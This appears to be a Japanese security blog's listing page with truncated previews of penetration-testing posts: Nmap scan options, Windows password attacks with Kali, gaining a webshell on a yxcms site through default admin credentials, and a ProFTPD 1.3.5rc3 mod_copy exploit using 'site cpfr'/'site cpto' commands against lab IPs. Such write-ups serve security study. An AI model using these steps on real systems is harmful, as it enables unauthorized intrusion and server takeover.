セキュリティツールと技術実践ガイド
セキュリティツールの活用
1.ペネトレーションテストツール
強力なペネトレーションテストフレームワークの活用法
2.Nmapスキャンコマンド
nmap hostname/IPまたは複数IPまたはサブネット192.168.123.*
-iL target.txt target.txt内のすべてのIPをスキャン
-A -sV、-Oを含む、OS情報検出と traceroute。激しいスキャンなので注意
-O OSバージョン検出
-sV サービス ...
6月18日 18:52 投稿
Kali Linux を用いた Windows 環境の認証突破と権限昇格ガイド
パスワード攻撃の基礎とツール活用
セキュリティ breach の多くの要因は、脆弱的な認証情報にあります。ネットワーク管理者やセキュリティエンジニアとして、ユーザーに対し強固なパスワードポリシーを周知することは必須です。しかし、専門家の間でも再使用的なパスワードや弱いパターンが使用され、それがシステム全体のリスクとなり得ます。本節では、ネットワーク上の ...
5月24日 20:26 投稿
内部ネットワークドメインの権限昇格手法と実践
初期アクセスとWebshellの取得
管理画面へのログイン
# 管理画面URL: http://192.168.43.17/yxcms/index.php?r=admin
# ユーザー名: admin
# パスワード: 123456
ファイルアップロードの悪用
バックアップファイルbeifen.rarからWebアプリケーションのディレクトリ構造を特定
# シェルファイルのパス: /yxcms/protected/apps/default/view/default/webshell.php
権限維 ...
5月19日 07:19 投稿
ProFTPD 1.3.5rc3における権限昇格の脆弱性分析
情報収集
対象システムの基本情報:
IPアドレス
開放ポート
192.168.101.148
21(FTP), 80(HTTP), 2121(代替FTP)
$ nmap -p- 192.168.101.148 --min-rate 1000 -sC -sV
ProFTPDの脆弱性悪用
ProFTPD 1.3.5rc3には以下のコマンドが有効:
ftp> site cpfr /proc/self/root
ftp> site cpto /var/www/html/root
パスワードクラッキング
$ cewl - ...
5月12日 15:09 投稿